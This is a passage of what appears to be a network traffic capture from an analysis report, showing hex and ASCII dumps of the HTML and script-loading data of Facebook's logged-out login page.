                                                                                                                                  Data Ascii: - _9ax_ _9ay1 UIPage_LoggedOut hasBanner _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="0LVHv3KX">requireLazy(["bootstrapWebSession"],function(j){j(1666037244)})</script><div class="_li" id="u_0_0
                                                                                                                                  2022-10-17 20:07:24 UTC1654INData Raw: 22 20 69 64 3d 22 65 72 72 6f 72 5f 62 6f 78 22 20 2f 3e 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 64 69 73 70 6c 61 79 22 20 6e 61 6d 65 3d 22 64 69 73 70 6c 61 79 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 69 73 70 72 69 76 61 74 65 22 20 6e 61 6d 65 3d 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 73 65 73
                                                                                                                                  Data Ascii: " id="error_box" /><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="return_ses
                                                                                                                                  2022-10-17 20:07:24 UTC1655INData Raw: 76 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 74 22 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 32 65 30 20 5f 34 6a 79 36 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20 68 72 65
                                                                                                                                  Data Ascii: v></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a hre
                                                                                                                                  2022-10-17 20:07:24 UTC1657INData Raw: 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 67 65 28 22 65 6d 61 69 6c 22 29 2c 63 3d 67 65 28 22 70 61 73 73 22 29 3b 74 72 79 7b 62 26 26 21 62 2e 76 61 6c 75 65 3f 62 2e 66 6f 63 75 73 28 29 3a 63 26 26 63 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 69 66 28 21 28 61 2e 6e 75 6d 62 65 72 3d 3d 2d 32 31 34 36 38 32 36 31 37 38 29 29 74 68 72 6f 77 20 61 7d 72 65 74 75 72 6e 20 61 26 26 61 2e 63 61 6c 6c 28 77 69 6e 64 6f 77 29 7d 7d 28 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 29 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 61 3d 6e
                                                                                                                                  Data Ascii: eturn function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=n
                                                                                                                                  2022-10-17 20:07:24 UTC1658INData Raw: 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 66 72 5f 46 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70
                                                                                                                                  Data Ascii: k.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=http
                                                                                                                                  2022-10-17 20:07:24 UTC1660INData Raw: 72 74 75 67 61 6c 29 22 3e 50 6f 72 74 75 67 75 c3 aa 73 20 28 50 6f 72 74 75 67 61 6c 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61
                                                                                                                                  Data Ascii: rtugal)">Portugus (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLoca
                                                                                                                                  2022-10-17 20:07:24 UTC1661INData Raw: 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 72 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c
                                                                                                                                  Data Ascii: ot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">Trke</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" oncl
                                                                                                                                  2022-10-17 20:07:24 UTC1662INData Raw: 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 6e 61 29 22 3e e4 b8 ad e6 96 87 28 e7 ae 80 e4 bd 93 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61 78 69 66
                                                                                                                                  Data Ascii: u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)">()</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxif
                                                                                                                                  2022-10-17 20:07:24 UTC1664INData Raw: 2f 77 77 77 2e 6f 63 75 6c 75 73 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 4f 63 75 6c 75 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4f 63 75 6c 75 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 50 6f 72 74 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77
                                                                                                                                  Data Ascii: /www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fw
                                                                                                                                  2022-10-17 20:07:24 UTC1665INData Raw: 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 43 72 65 61 74 65 20 61 20 70 61 67 65 22 3e 43 72 65 61 74 65 20 50 61 67 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f 61 3e
                                                                                                                                  Data Ascii: oter" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a>
                                                                                                                                  2022-10-17 20:07:24 UTC1667INData Raw: 20 77 69 64 74 68 3d 22 30 22 20 68 65 69 67 68 74 3d 22 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 2f 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 62 78 44 61 74 61 22 3a 7b 22 38 37 35 32 33 31 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44 61 74
                                                                                                                                  Data Ascii: width="0" height="0" style="display:none" /></span></div><div style="display:none"></div><script>requireLazy(["HasteSupportData"],function(m){m.handle({"bxData":{"875231":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clpDat
                                                                                                                                  2022-10-17 20:07:24 UTC1668INData Raw: 38 34 30 38 30 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6e 59 63 74 6f 54 73 72 37 61 6c 52 69 59 54 6b 22 7d 2c 22 31 38 34 38 37 34 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 47 73 48 39 4b 62 2d 33 57 2d 74 61 5a 43 30 41 22 7d 2c 22 31 39 30 36 38 37 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 64 49 42 69 56 76 39 62 55 44 58 6c 6d 79 6f 59 22 7d 2c 22 31 39 38 35 39 34 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 50 48 63 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 30
                                                                                                                                  Data Ascii: 840809":{"result":false,"hash":"AT5nYctoTsr7alRiYTk"},"1848749":{"result":false,"hash":"AT5GsH9Kb-3W-taZC0A"},"1906871":{"result":false,"hash":"AT6dIBiVv9bUDXlmyoY"},"1985945":{"result":true,"hash":"AT66Oo5lY__5wUTpPHc"},"5541":{"result":true,"hash":"AT70
                                                                                                                                  2022-10-17 20:07:24 UTC1670INData Raw: 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 4b 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 37 58 46 72 73 4d 5a 61 6d 76 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 76 47 74 32 6d 78 7a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 6c 5f 64 45 45 6c 4a 69 42 43 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 30 72 48 69 64 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74
                                                                                                                                  Data Ascii: ps:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yK\/l\/en_US\/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz"},"vGt2mxz":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz"},"R0rHidL":{"type":"js","src":"https:\/\/st
                                                                                                                                  2022-10-17 20:07:24 UTC1671INData Raw: 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 6e 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 55 39 69 37 53 4d 63 77 48 36 73 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6f 5c 2f 75 6e 79 72 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 65 47 61 68 6c 57 63 78 56 6c 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 65 4d 6b 4d 78 48 5a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c
                                                                                                                                  Data Ascii: php\/v3iLl54\/yn\/l\/en_US\/U9i7SMcwH6s.js?_nc_x=Ij3Wp8lg5Kz"},"o\/unyrn":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/eGahlWcxVln.js?_nc_x=Ij3Wp8lg5Kz"},"eMkMxHZ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\
                                                                                                                                  2022-10-17 20:07:24 UTC1673INData Raw: 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 71 31 6a 53 5a 38 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 72 5c 2f 46 31 6e 57 6d 57 61 42 4f 65 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6a 51 37 6e 5c 2f 39 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 79 4e 59 63 63 35 65 43 6a 75 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6b 4b
                                                                                                                                  Data Ascii: _x=Ij3Wp8lg5Kz"},"q1jSZ8c":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/r\/F1nWmWaBOeO.js?_nc_x=Ij3Wp8lg5Kz"},"jQ7n\/9j":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/yNYcc5eCjuy.js?_nc_x=Ij3Wp8lg5Kz"},"kK
                                                                                                                                  2022-10-17 20:07:24 UTC1674INData Raw: 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 33 5c 2f 72 5c 2f 74 6a 51 34 46 48 5a 4e 42 5a 49 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 79 68 6d 4d 4b 66 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 76 43 36 34 5c 2f 79 71 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 34 5a 6a 6d 33 64 75 5a 47 72 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74
                                                                                                                                  Data Ascii: cdn.net\/rsrc.php\/v3\/y3\/r\/tjQ4FHZNBZI.js?_nc_x=Ij3Wp8lg5Kz"},"yhmMKfP":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ivC64\/yq\/l\/en_US\/4Zjm3duZGrQ.js?_nc_x=Ij3Wp8lg5Kz"},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.net
                                                                                                                                  2022-10-17 20:07:24 UTC1676INData Raw: 5c 2f 72 5c 2f 77 34 48 5f 31 59 71 67 70 4c 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 32 47 70 61 6b 5c 2f 31 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 58 75 34 5c 2f 79 31 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 58 4e 36 4d 39 6b 79 61 4b 52 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 46 75 50 62 57 68 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 61 5c 2f 72 5c 2f 72 39 78
                                                                                                                                  Data Ascii: \/r\/w4H_1YqgpLv.js?_nc_x=Ij3Wp8lg5Kz"},"2Gpak\/1":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ieXu4\/y1\/l\/en_US\/XN6M9kyaKRX.js?_nc_x=Ij3Wp8lg5Kz"},"iFuPbWh":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ya\/r\/r9x
                                                                                                                                  2022-10-17 20:07:24 UTC1677INData Raw: 5c 2f 49 30 68 4c 78 4b 73 63 6d 71 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 63 59 55 33 63 33 32 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 6a 51 46 6c 74 34 67 79 70 39 52 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 33 4f 67 53 4a 45 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5f 5c 2f 72 5c 2f 6a 69 58 4c 74 37 7a 61 4d 49 70 2e 6a 73 3f 5f 6e 63 5f
                                                                                                                                  Data Ascii: \/I0hLxKscmqy.js?_nc_x=Ij3Wp8lg5Kz"},"cYU3c32":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz"},"3OgSJE4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y_\/r\/jiXLt7zaMIp.js?_nc_
                                                                                                                                  2022-10-17 20:07:24 UTC1679INData Raw: 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 62 30 79 30 58 59 77 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 72 51 4c 34 5c 2f 79 59 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 47 79 74 6b 52 5a 46 4c 42 77 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 47 72 78 57 58 32 65 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 50 76 56 7a 58 39 45 41 4b 46 61 2e 63 73 73 3f 5f 6e 63 5f 78 3d
                                                                                                                                  Data Ascii: 3Wp8lg5Kz"},"b0y0XYw":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3irQL4\/yY\/l\/en_US\/GytkRZFLBwM.js?_nc_x=Ij3Wp8lg5Kz"},"GrxWX2e":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/l\/0,cross\/PvVzX9EAKFa.css?_nc_x=
